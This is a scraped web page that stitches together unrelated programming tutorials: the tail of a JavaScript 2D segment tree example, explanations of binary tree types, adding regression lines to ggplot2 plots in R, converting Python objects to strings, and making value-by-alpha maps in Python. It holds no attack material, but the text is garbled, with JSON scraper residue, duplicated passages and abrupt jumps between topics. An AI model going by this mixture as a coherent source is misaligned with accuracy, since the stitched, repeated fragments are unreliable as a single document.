let size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/function segment(low,high,pos,strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { let mid = Math.floor((low + high) / 2); segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[][] = { }.*/function finalSegment(low,high,pos){ if (high == low) { for (let i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { let mid = Math.floor((low + high) / 2); finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (let i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/function finalQuery(pos,start,end,x1,x2,node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } let mid = Math.floor((start + end) / 2); let p1 = finalQuery(2 * pos, start, mid, x1, x2, node); let p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/function query(pos,start,end,y1,y2,x1,x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } let mid = Math.floor((start + end) / 2); let p1 = query(2 * pos, start, mid, y1, y2, x1, x2); let p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. 
val -->Value to be change at node idx*/function finalUpdate(pos,low,high,x,val,node){ if (low == high) { fin_seg[node][pos] = val; } else { let mid = Math.floor((low + high) / 2); if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[][].*/function update(pos,low,high,x,y,val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { let mid = Math.floor((low + high) / 2); if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (let i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver codelet pos = 1;let low = 0;let high = 3; // Call the ini_segment() to create the// initial segment tree on x- coordinatefor (let strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to// built the 2d segment tree.finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/document.write(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \" (x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)+\"<br>\"); // Function to update the valueupdate(1, 1, 4, 2, 3, 100); document.write(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \"(x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)+\"<br>\"); // This code is contributed by rag2127</script>", "e": 54266, "s": 49030, "text": null }, { "code": null, "e": 54400, "s": 54266, "text": "The sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 25\nThe sum of the submatrix (y1, y2)->(2, 3), (x1, x2)->(2, 3) is 118" }, { "code": null, "e": 54518, "s": 54402, "text": "Time complexity : Processing Query : O(logn*logm) Modification Query: O(2*n*logn*logm) Space Complexity : O(4*m*n) " }, { "code": null, "e": 54524, "s": 54518, "text": "ukasp" }, { "code": null, "e": 54536, "s": 54524, "text": "29AjayKumar" }, { "code": null, "e": 54550, "s": 54536, "text": "princiraj1992" }, { "code": null, "e": 54564, "s": 54550, "text": "shubham_singh" }, { "code": null, "e": 54577, "s": 54564, "text": "Akanksha_Rai" }, { "code": null, "e": 54585, "s": 54577, "text": "rag2127" }, { "code": null, "e": 54594, "s": 54585, "text": "sweetyty" }, { "code": null, "e": 54609, "s": 54594, "text": "sagar0719kumar" }, { "code": null, "e": 54629, "s": 54609, "text": "array-range-queries" }, { "code": null, "e": 54642, "s": 54629, "text": "Segment-Tree" }, { "code": null, "e": 54666, "s": 54642, "text": "Advanced Data Structure" }, { "code": null, "e": 54690, "s": 54666, "text": "Competitive Programming" }, { "code": null, "e": 54700, "s": 54690, "text": "Recursion" }, { "code": null, "e": 54719, "s": 54700, "text": "Technical Scripter" }, { "code": null, "e": 54724, "s": 54719, "text": "Tree" }, { "code": null, "e": 54734, "s": 54724, "text": "Recursion" }, { "code": null, "e": 54739, "s": 54734, "text": "Tree" }, { "code": null, "e": 54752, "s": 54739, "text": "Segment-Tree" }, { "code": null, "e": 54850, "s": 54752, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." 
}, { "code": null, "e": 54879, "s": 54850, "text": "Ordered Set and GNU C++ PBDS" }, { "code": null, "e": 54921, "s": 54879, "text": "2-3 Trees | (Search, Insert and Deletion)" }, { "code": null, "e": 54967, "s": 54921, "text": "Extendible Hashing (Dynamic approach to DBMS)" }, { "code": null, "e": 55003, "s": 54967, "text": "Suffix Array | Set 1 (Introduction)" }, { "code": null, "e": 55064, "s": 55003, "text": "Difference between Backtracking and Branch-N-Bound technique" }, { "code": null, "e": 55107, "s": 55064, "text": "Competitive Programming - A Complete Guide" }, { "code": null, "e": 55150, "s": 55107, "text": "Practice for cracking any coding interview" }, { "code": null, "e": 55191, "s": 55150, "text": "Arrow operator -> in C/C++ with Examples" }, { "code": null, "e": 55269, "s": 55191, "text": "Prefix Sum Array - Implementation and Applications in Competitive Programming" } ]
Binary Tree ADT in Data Structure
A binary tree is defined as a tree in which no node can have more than two children. The highest degree of any node is two. This indicates that the degree of a binary tree is either zero, one, or two. In the above fig., the binary tree consists of a root and two sub trees TreeLeft & TreeRight. All nodes to the left of the binary tree are denoted as left subtrees and all nodes to the right of a binary tree are referred to as right subtrees. A binary tree has at most two children, so we can assign direct pointers to them. The declaration of tree nodes is similar in structure to that for doubly linked lists, in that a node is a structure including the key information plus two pointers (left and right) to other nodes. typedef struct tree_node *tree_ptr; struct tree_node { element_type element1; tree_ptr left1; tree_ptr right1; }; typedef tree_ptr TREE; Strictly binary tree A strictly binary tree is defined as a binary tree in which every node has either zero or two children; no node has exactly one child. Skew tree A skew tree is defined as a binary tree in which every node except the leaf has only one child node. There are two types of skew trees, i.e. the left-skewed binary tree and the right-skewed binary tree. Left skewed binary tree In a left-skewed tree, every node has only a left child. It is a binary tree that contains only left subtrees. Right skewed binary tree In a right-skewed tree, every node has only a right child. It is a binary tree that contains only right subtrees. Full binary tree or proper binary tree A binary tree is defined as a full binary tree if all leaves are at the same level, every non-leaf node has exactly two children, and every level contains the highest possible number of nodes. A full binary tree of height h has at most 2^(h+1) - 1 nodes. Complete binary tree Every non-leaf node has exactly two children, but all leaves need not be at the same level. A complete binary tree is defined as one where all levels have the highest number of nodes except possibly the last level. The last-level elements should be filled from left to right. Almost complete binary tree An almost complete binary tree is defined as a tree in which each node that has a right child also has a left child. Having a left child does not require a node to have a right child. Differences between General Tree and Binary Tree A general tree has no limit on the number of children. Evaluating any expression is hard in general trees. Binary Tree A binary tree has at most two children Evaluation of an expression is simple in a binary tree. Application of trees Manipulation of arithmetic expression Construction of symbol table Analysis of Syntax Writing Grammar Creation of Expression Tree
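To make these classifications concrete, here is a small Python sketch; the Node class and the two checker functions are illustrative names rather than part of any standard library.

# Illustrative sketch of two of the classifications above.
class Node:
    def __init__(self, key, left=None, right=None):
        self.key, self.left, self.right = key, left, right

def is_strict(root):
    # Strictly binary: every node has either zero or two children.
    if root is None:
        return True
    if (root.left is None) != (root.right is None):
        return False
    return is_strict(root.left) and is_strict(root.right)

def is_skewed(root):
    # Skew tree: every non-leaf node has exactly one child.
    while root is not None:
        if root.left is not None and root.right is not None:
            return False
        root = root.left if root.left is not None else root.right
    return True

full = Node(1, Node(2, Node(4), Node(5)), Node(3))  # strictly binary tree
left_skew = Node(1, Node(2, Node(3)))               # left-skewed tree
print(is_strict(full), is_skewed(full))             # True False
print(is_strict(left_skew), is_skewed(left_skew))   # False True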
[ { "code": null, "e": 1264, "s": 1062, "text": "A binary tree is defined as a tree in which no node can have more than two children. The highest degree of any node is two. This indicates that the degree of a binary tree is either zero or one or two." }, { "code": null, "e": 1507, "s": 1264, "text": "In the above fig., the binary tree consists of a root and two sub trees TreeLeft & TreeRight. All nodes to the left of the binary tree are denoted as left subtrees and all nodes to the right of a binary tree are referred to as right subtrees." }, { "code": null, "e": 1784, "s": 1507, "text": "A binary tree has maximum two children; we can assign direct pointers to them. The declaration of tree nodes is same as in structure to that for doubly linked lists, in that a node is a structure including the key information plus two pointers (left and right) to other nodes." }, { "code": null, "e": 1927, "s": 1784, "text": "typedef struct tree_node *tree_ptr;\nstruct tree_node\n{\n element_type element1;\n tree_ptr left1; tree_ptr right1;\n};\ntypedef tree_ptr TREE;" }, { "code": null, "e": 1948, "s": 1927, "text": "Strictly binary tree" }, { "code": null, "e": 2099, "s": 1948, "text": "Strictly binary tree is defined as a binary tree where all the nodes will have either zero or two children. It does not include one child in any node." }, { "code": null, "e": 2109, "s": 2099, "text": "Skew tree" }, { "code": null, "e": 2303, "s": 2109, "text": "A skew tree is defined as a binary tree in which every node except the leaf has only one child node. There are two types of skew tree, i.e. left skewed binary tree and right skewed binary tree." }, { "code": null, "e": 2327, "s": 2303, "text": "Left skewed binary tree" }, { "code": null, "e": 2439, "s": 2327, "text": "A left skew tree has node associated with only the left child. It is a binary tree contains only left subtrees." }, { "code": null, "e": 2464, "s": 2439, "text": "Right skewed binary tree" }, { "code": null, "e": 2579, "s": 2464, "text": "A right skew tree has node associated with only the right child. It is a binary tree contains only right subtrees." }, { "code": null, "e": 2618, "s": 2579, "text": "Full binary tree or proper binary tree" }, { "code": null, "e": 2882, "s": 2618, "text": "A binary tree is defined as a full binary tree if all leaves are at the same level and every non leaf node has exactly two children and it should consist of highest possible number of nodes in all levels. A full binary tree of height h has maximum 2h+1 – 1 nodes." }, { "code": null, "e": 2904, "s": 2882, "text": " Complete binary tree" }, { "code": null, "e": 3196, "s": 2904, "text": "Every non leaf node has exactly two children but all leaves are not necessary to belong at the same level. A complete binary tree is defined as one where all levels have the highest number of nodes except the last level. The last level elements should be filled from left to right direction." }, { "code": null, "e": 3225, "s": 3196, "text": " Almost complete binary tree" }, { "code": null, "e": 3405, "s": 3225, "text": "An almost complete binary tree is defined as a tree in which each node that has a right child also has a left child. Having a left child does not need a node to have a right child" }, { "code": null, "e": 3454, "s": 3405, "text": "Differences between General Tree and Binary Tree" }, { "code": null, "e": 3503, "s": 3454, "text": "General tree has no limit of number of children." 
}, { "code": null, "e": 3555, "s": 3503, "text": "Evaluating any expression is hard in general trees." }, { "code": null, "e": 3567, "s": 3555, "text": "Binary Tree" }, { "code": null, "e": 3606, "s": 3567, "text": "A binary tree has maximum two children" }, { "code": null, "e": 3657, "s": 3606, "text": "Evaluation of expression is simple in binary tree." }, { "code": null, "e": 3678, "s": 3657, "text": "Application of trees" }, { "code": null, "e": 3716, "s": 3678, "text": "Manipulation of arithmetic expression" }, { "code": null, "e": 3745, "s": 3716, "text": "Construction of symbol table" }, { "code": null, "e": 3764, "s": 3745, "text": "Analysis of Syntax" }, { "code": null, "e": 3780, "s": 3764, "text": "Writing Grammar" }, { "code": null, "e": 3808, "s": 3780, "text": "Creation of Expression Tree" } ]
Add Regression Line to ggplot2 Plot in R - GeeksforGeeks
28 Apr, 2021 Regression models a target prediction value based on independent variables. It is mostly used for finding out the relationship between variables and forecasting. Different regression models differ based on the kind of relationship between the dependent and independent variables they consider, and the number of independent variables being used. The best way of understanding things is to visualize them; we can visualize regression by plotting a regression line over our dataset. In most cases, we use a scatter plot to represent our dataset and draw a regression line to visualize how regression is working. Approach: In R Programming Language it is easy to visualize things. The approach towards plotting the regression line includes the following steps: Create the dataset to plot the data points Use the ggplot2 library to plot the data points using the ggplot() function Use the geom_point() function to plot the dataset in a scatter plot Use any of the smoothening functions to draw a regression line over the dataset, which includes the usage of the lm() function to calculate the intercept and slope of the line. Various smoothening functions are shown below. Method 1: Using stat_smooth() In R we can use the stat_smooth() function to smooth the visualization. Syntax: stat_smooth(method="method_name", formula=formula_to_be_used, geom='method name') Parameters: method: It is the smoothing method (function) to use for smoothing the line formula: It is the formula to use in the smoothing function geom: It is the geometric object to use to display the data In order to show the regression line on the plot with the help of the stat_smooth() function, we pass the method as "lm", the formula as y ~ x, and geom as 'smooth'. R # Create example datarm(list = ls())set.seed(87) x <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) # Print first rows of datahead(data) # Install & load ggplot2 library("ggplot2") # Create basic ggplot# and Add regression lineggp <- ggplot(data, aes(x, y)) + geom_point()ggpggp + stat_smooth(method = "lm", formula = y ~ x, geom = "smooth") Output: Method 2: Using geom_smooth() In R we can use the geom_smooth() function to represent a regression line and smooth the visualization. Syntax: geom_smooth(method="method_name", formula=formula_to_be_used) Parameters: method: It is the smoothing method (function) to use for smoothing the line formula: It is the formula to use in the smoothing function In this example, we are using the Boston dataset that contains data on housing prices from a package named MASS. In order to show the regression line on the plot with the help of the geom_smooth() function, we pass the method as "loess" and the formula as y ~ x. R # importing essential librarieslibrary(dplyr)library(caret)library(ggplot2) # Load the datadata("Boston", package = "MASS") # Split the data into training and test settraining.samples <- Boston$medv %>% createDataPartition(p = 0.85, list = FALSE) #Create train and test datatrain.data <- Boston[training.samples, ]test.data <- Boston[-training.samples, ] # plotting the dataggp<-ggplot(train.data, aes(lstat, medv) ) + geom_point() # adding the regression line to itggp+geom_smooth(method = "loess", formula = y ~ x) Output: Method 3: Using geom_abline() We can create the regression line using the geom_abline() function. It uses the slope and intercept calculated by fitting a linear regression with the lm() function. 
Syntax: geom_abline(intercept, slope, linetype, color, size) Parameters: intercept: The calculated y intercept of the line to be drawn slope: Slope of the line to be drawn linetype: Specifies the type of the line to be drawn color: Color of the line to be drawn size: Indicates the size of the line The intercept and slope can be easily calculated by fitting a linear regression with the lm() function and then calling coefficients(). R rm(list = ls()) # Install & load ggplot2library("ggplot2") set.seed(87) # Create example datax <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) reg<-lm(formula = y ~ x, data=data) #get intercept and slope valuecoeff<-coefficients(reg) intercept<-coeff[1]slope<- coeff[2] # Create basic ggplotggp <- ggplot(data, aes(x, y)) + geom_point() # add the regression lineggp+geom_abline(intercept = intercept, slope = slope, color="red", linetype="dashed", size=1.5)+ ggtitle("geeksforgeeks") Output: Picked R-ggplot R Language Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Group by function in R using Dplyr Change Color of Bars in Barchart using ggplot2 in R How to Split Column Into Multiple Columns in R DataFrame? How to Change Axis Scales in R Plots? Replace Specific Characters in String in R How to filter R DataFrame by values in a column? Time Series Analysis in R How to filter R dataframe by multiple conditions? Logistic Regression in R Programming R - if statement
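For reference, the slope and intercept that lm() feeds into geom_abline() are the standard ordinary-least-squares estimates for the simple model y ~ x:

$$\hat{\beta}_1 = \frac{\sum_{i=1}^{n}(x_i - \bar{x})(y_i - \bar{y})}{\sum_{i=1}^{n}(x_i - \bar{x})^2}, \qquad \hat{\beta}_0 = \bar{y} - \hat{\beta}_1 \bar{x}$$

so geom_abline(intercept, slope) draws exactly the fitted line $\hat{y} = \hat{\beta}_0 + \hat{\beta}_1 x$.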
[ { "code": null, "e": 25340, "s": 25312, "text": "\n28 Apr, 2021" }, { "code": null, "e": 25691, "s": 25340, "text": "Regression models a target prediction value based on independent variables. It is mostly used for finding out the relationship between variables and forecasting. Different regression models differ based on – the kind of relationship between dependent and independent variables, they are considering and the number of independent variables being used." }, { "code": null, "e": 25947, "s": 25691, "text": "The best way of understanding things is to visualize, we can visualize regression by plotting regression lines in our dataset. In most cases, we use a scatter plot to represent our dataset and draw a regression line to visualize how regression is working." }, { "code": null, "e": 25957, "s": 25947, "text": "Approach:" }, { "code": null, "e": 26096, "s": 25957, "text": "In R Programming Language it is easy to visualize things. The approach towards plotting the regression line includes the following steps:-" }, { "code": null, "e": 26139, "s": 26096, "text": "Create the dataset to plot the data points" }, { "code": null, "e": 26215, "s": 26139, "text": "Use the ggplot2 library to plot the data points using the ggplot() function" }, { "code": null, "e": 26279, "s": 26215, "text": "Use geom_point() function to plot the dataset in a scatter plot" }, { "code": null, "e": 26493, "s": 26279, "text": "Use any of the smoothening functions to draw a regression line over the dataset which includes the usage of lm() function to calculate intercept and slope of the line. Various smoothening functions are show below." }, { "code": null, "e": 26523, "s": 26493, "text": "Method 1: Using stat_smooth()" }, { "code": null, "e": 26597, "s": 26523, "text": "In R we can use the stat_smooth() function to smoothen the visualization." }, { "code": null, "e": 26687, "s": 26597, "text": "Syntax: stat_smooth(method=”method_name”, formula=fromula_to_be_used, geom=’method name’)" }, { "code": null, "e": 26700, "s": 26687, "text": "Parameters: " }, { "code": null, "e": 26776, "s": 26700, "text": "method: It is the smoothing method (function) to use for smoothing the line" }, { "code": null, "e": 26836, "s": 26776, "text": "formula: It is the formula to use in the smoothing function" }, { "code": null, "e": 26893, "s": 26836, "text": "geom: It is the geometric object to use display the data" }, { "code": null, "e": 27061, "s": 26893, "text": "In order to show regression line on the graphical medium with help of stat_smooth() function, we pass a method as “lm”, the formula used as y ~ x. and geom as ‘smooth’" }, { "code": null, "e": 27063, "s": 27061, "text": "R" }, { "code": "# Create example datarm(list = ls())set.seed(87) x <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) # Print first rows of datahead(data) # Install & load ggplot2 library(\"ggplot2\") # Create basic ggplot# and Add regression lineggp <- ggplot(data, aes(x, y)) + geom_point()ggpggp + stat_smooth(method = \"lm\", formula = y ~ x, geom = \"smooth\")", "e": 27573, "s": 27063, "text": null }, { "code": null, "e": 27581, "s": 27573, "text": "Output:" }, { "code": null, "e": 27611, "s": 27581, "text": "Method 2: Using geom_smooth()" }, { "code": null, "e": 27718, "s": 27611, "text": "In R we can use the geom_smooth() function to represent a regression line and smoothen the visualization. 
" }, { "code": null, "e": 27788, "s": 27718, "text": "Syntax: geom_smooth(method=”method_name”, formula=fromula_to_be_used)" }, { "code": null, "e": 27800, "s": 27788, "text": "Parameters:" }, { "code": null, "e": 27876, "s": 27800, "text": "method: It is the smoothing method (function) to use for smoothing the line" }, { "code": null, "e": 27936, "s": 27876, "text": "formula: It is the formula to use in the smoothing function" }, { "code": null, "e": 28208, "s": 27936, "text": "In this example, we are using the Boston dataset that contains data on housing prices from a package named MASS. In order to show the regression line on the graphical medium with help of geom_smooth() function, we pass the method as “loess” and the formula used as y ~ x." }, { "code": null, "e": 28210, "s": 28208, "text": "R" }, { "code": "# importing essential librarieslibrary(dplyr) # Load the datadata(\"Boston\", package = \"MASS\") # Split the data into training and test settraining.samples <- Boston$medv %>% createDataPartition(p = 0.85, list = FALSE) #Create train and test datatrain.data <- Boston[training.samples, ]test.data <- Boston[-training.samples, ] # plotting the dataggp<-ggplot(train.data, aes(lstat, medv) ) + geom_point() # adding the regression line to itggp+geom_smooth(method = \"loess\", formula = y ~ x)", "e": 28719, "s": 28210, "text": null }, { "code": null, "e": 28727, "s": 28719, "text": "Output:" }, { "code": null, "e": 28757, "s": 28727, "text": "Method 3: Using geom_abline()" }, { "code": null, "e": 28936, "s": 28757, "text": "We can create the regression line using geom_abline() function. It uses the coefficient and intercepts which are calculated by applying the linear regression using lm() function." }, { "code": null, "e": 28997, "s": 28936, "text": "Syntax: geom_abline(intercept, slope, linetype, color, size)" }, { "code": null, "e": 29009, "s": 28997, "text": "Parameters:" }, { "code": null, "e": 29071, "s": 29009, "text": "intercept: The calculated y intercept of the line to be drawn" }, { "code": null, "e": 29108, "s": 29071, "text": "slope: Slope of the line to be drawn" }, { "code": null, "e": 29162, "s": 29108, "text": "linetype: Specifies the type of the line to be drawn " }, { "code": null, "e": 29199, "s": 29162, "text": "color: Color of the lone to be drawn" }, { "code": null, "e": 29236, "s": 29199, "text": "size: Indicates the size of the line" }, { "code": null, "e": 29371, "s": 29236, "text": "The intercept and slope can be easily calculated by the lm() function which is used for linear regression followed by coefficients(). 
" }, { "code": null, "e": 29373, "s": 29371, "text": "R" }, { "code": "rm(list = ls()) # Install & load ggplot2library(\"ggplot2\") set.seed(87) # Create example datax <- rnorm(250)y <- rnorm(250) + 2 *xdata <- data.frame(x, y) reg<-lm(formula = y ~ x, data=data) #get intercept and slope valuecoeff<-coefficients(reg) intercept<-coeff[1]slope<- coeff[2] # Create basic ggplotggp <- ggplot(data, aes(x, y)) + geom_point() # add the regression lineggp+geom_abline(intercept = intercept, slope = slope, color=\"red\", linetype=\"dashed\", size=1.5)+ ggtitle(\"geeksforgeeks\") ", "e": 29941, "s": 29373, "text": null }, { "code": null, "e": 29949, "s": 29941, "text": "Output:" }, { "code": null, "e": 29956, "s": 29949, "text": "Picked" }, { "code": null, "e": 29965, "s": 29956, "text": "R-ggplot" }, { "code": null, "e": 29976, "s": 29965, "text": "R Language" }, { "code": null, "e": 30074, "s": 29976, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 30109, "s": 30074, "text": "Group by function in R using Dplyr" }, { "code": null, "e": 30161, "s": 30109, "text": "Change Color of Bars in Barchart using ggplot2 in R" }, { "code": null, "e": 30219, "s": 30161, "text": "How to Split Column Into Multiple Columns in R DataFrame?" }, { "code": null, "e": 30257, "s": 30219, "text": "How to Change Axis Scales in R Plots?" }, { "code": null, "e": 30300, "s": 30257, "text": "Replace Specific Characters in String in R" }, { "code": null, "e": 30349, "s": 30300, "text": "How to filter R DataFrame by values in a column?" }, { "code": null, "e": 30375, "s": 30349, "text": "Time Series Analysis in R" }, { "code": null, "e": 30425, "s": 30375, "text": "How to filter R dataframe by multiple conditions?" }, { "code": null, "e": 30462, "s": 30425, "text": "Logistic Regression in R Programming" } ]
Convert Object to String in Python - GeeksforGeeks
28 Jul, 2020 Python defines type conversion functions to directly convert one data type to another. This article is aimed at providing information about converting an object to a string. Everything is an object in Python. So all the built-in objects can be converted to strings using the str() and repr() methods. Example 1: Using str() method Python3 # object of intInt = 6 # object of floatFloat = 6.0 # Converting to strings1 = str(Int)print(s1)print(type(s1)) s2= str(Float)print(s2)print(type(s2)) Output: 6 <class 'str'> 6.0 <class 'str'> Example 2: Use repr() to convert an object to a string Python3 print(repr({"a": 1, "b": 2}))print(repr([1, 2, 3])) # Custom classclass C(): def __repr__(self): return "This is class C" # Converting custom object to # stringprint(repr(C())) Output: {'a': 1, 'b': 2} [1, 2, 3] This is class C Note: To know more about str() and repr() and the difference between the two, refer to str() vs repr() in Python python-string Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Python Dictionary Read a file line by line in Python Enumerate() in Python Iterate over a list in Python How to Install PIP on Windows ? Different ways to create Pandas Dataframe Create a Pandas DataFrame from Lists Python program to convert a list to string Reading and Writing to text files in Python sum() function in Python
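A short illustrative sketch of how the two conversions differ on a custom class (the Point class below is a made-up example, not from the article):

# str() falls back to __str__, repr() to __repr__.
class Point:
    def __init__(self, x, y):
        self.x, self.y = x, y
    def __repr__(self):
        # Unambiguous, developer-facing form.
        return f"Point(x={self.x}, y={self.y})"
    def __str__(self):
        # Readable, user-facing form.
        return f"({self.x}, {self.y})"

p = Point(2, 3)
print(str(p))   # (2, 3)          -> uses __str__
print(repr(p))  # Point(x=2, y=3) -> uses __repr__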
[ { "code": null, "e": 24866, "s": 24838, "text": "\n28 Jul, 2020" }, { "code": null, "e": 25040, "s": 24866, "text": "Python defines type conversion functions to directly convert one data type to another. This article is aimed at providing information about converting an object to a string." }, { "code": null, "e": 25167, "s": 25040, "text": "Everything is an object in Python. So all the built-in objects can be converted to strings using the str() and repr() methods." }, { "code": null, "e": 25197, "s": 25167, "text": "Example 1: Using str() method" }, { "code": null, "e": 25205, "s": 25197, "text": "Python3" }, { "code": "# object of intInt = 6 # object of floatFloat = 6.0 # Converting to strings1 = str(Int)print(s1)print(type(s1)) s2= str(Float)print(s2)print(type(s2))", "e": 25359, "s": 25205, "text": null }, { "code": null, "e": 25367, "s": 25359, "text": "Output:" }, { "code": null, "e": 25401, "s": 25367, "text": "6\n<class 'str'>\n6.0\n<class 'str'>" }, { "code": null, "e": 25456, "s": 25401, "text": "Example 2: Use repr() to convert an object to a string" }, { "code": null, "e": 25464, "s": 25456, "text": "Python3" }, { "code": "print(repr({\"a\": 1, \"b\": 2}))print(repr([1, 2, 3])) # Custom classclass C(): def __repr__(self): return \"This is class C\" # Converting custom object to # stringprint(repr(C()))", "e": 25653, "s": 25464, "text": null }, { "code": null, "e": 25661, "s": 25653, "text": "Output:" }, { "code": null, "e": 25704, "s": 25661, "text": "{'a': 1, 'b': 2}\n[1, 2, 3]\nThis is class C" }, { "code": null, "e": 25809, "s": 25704, "text": "Note: To know more about str() and repr() and the difference between to refer, str() vs repr() in Python" }, { "code": null, "e": 25823, "s": 25809, "text": "python-string" }, { "code": null, "e": 25830, "s": 25823, "text": "Python" }, { "code": null, "e": 25928, "s": 25830, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 25937, "s": 25928, "text": "Comments" }, { "code": null, "e": 25950, "s": 25937, "text": "Old Comments" }, { "code": null, "e": 25968, "s": 25950, "text": "Python Dictionary" }, { "code": null, "e": 26003, "s": 25968, "text": "Read a file line by line in Python" }, { "code": null, "e": 26025, "s": 26003, "text": "Enumerate() in Python" }, { "code": null, "e": 26055, "s": 26025, "text": "Iterate over a list in Python" }, { "code": null, "e": 26087, "s": 26055, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 26129, "s": 26087, "text": "Different ways to create Pandas Dataframe" }, { "code": null, "e": 26166, "s": 26129, "text": "Create a Pandas DataFrame from Lists" }, { "code": null, "e": 26209, "s": 26166, "text": "Python program to convert a list to string" }, { "code": null, "e": 26253, "s": 26209, "text": "Reading and Writing to text files in Python" } ]
How to make Value-By-Alpha Maps in Python | by Abdishakur | Towards Data Science
Ever since I have seen the beautiful aesthetics of Value-By-Alpha maps, I wanted to make one. It was not that hard to make them with a bit of hacking in QGIS or ArcGIS back then. Now, you can make your value-by-alpha map with Python thanks to the Pysal library and Splot. In this tutorial, I will guide you on how to make a value-by-alpha map using Python. But first, let us understand what a value-by-alpha map is, why use it, and when it is appropriate to use. Value-by-alpha is a bivariate choropleth technique where we consider two variables that affect each other, for example, election results and population density. The second variable acts as an equalizer for the other variable of interest. VBA therefore modifies the background colour through the alpha variable (transparency). Thus, lower values fade into the background, while higher values pop up. The VBA maps came into existence to reduce the larger-size bias in choropleth maps. Besides the aesthetics part, VBA can be a good fit when you want to highlight spotlights through colour instead of size, using choropleth techniques. It portrays the information much better than a pure choropleth map. However, you first need to have a variable which is consequential to the variable of interest (i.e., counties with more voters have consequential effects on election results). We will be using the Splot Python library to create our map and Geopandas to read the geospatial data. We use a subset of data from the 2012 elections in the USA. Let us first read the data and look at the first few rows. import geopandas as gpdfrom splot.mapping import vba_choroplethimport matplotlib.pyplot as plt%matplotlib inlinegdf = gpd.read_file("data/MN_elections_2012.gpkg")gdf.head() As you can see from the table below, we have a GeoDataFrame with different columns. For example, the BARACK OBA column holds the results in each area. We use choropleth maps most of the time, but as we have mentioned in the preceding section, it has its limitations. Let us first make a choropleth map out of the data to create a benchmark for the data visualization. We can pick, for example, the Barack Obama column. fig, ax = plt.subplots(figsize=(12,10))gdf.plot(column='BARACK OBA', scheme='quantiles', cmap='RdBu', ax=ax)ax.axis("off")plt.show() Now, we create a value-by-alpha map. To create our map, we need two columns. The first column is what we are interested in displaying in the map; for example, Barack Obama results. The second column holds the alpha values to equalize. This alpha equalization will eliminate low values from the map appearance and increase the spotlight effects in areas with high values. We can choose the total results as the alpha values. fig, ax = plt.subplots(figsize=(12,10))vba_choropleth( gdf['BARACK OBA'].values, gdf['Total Resu'].values, gdf, rgb_mapclassify=dict(classifier='quantiles'), alpha_mapclassify=dict(classifier='quantiles'), cmap='RdBu', ax=ax, revert_alpha=False )plt.show() The value-by-alpha map highlights the high-value areas immediately, even if they are not large. Compared to the choropleth map, in which large areas dominate the visual, the value-by-alpha map clearly shows the high-value areas. We can simply use a black background to emphasize the spotlight effect as well. Compare the below value-by-alpha map with the one above. 
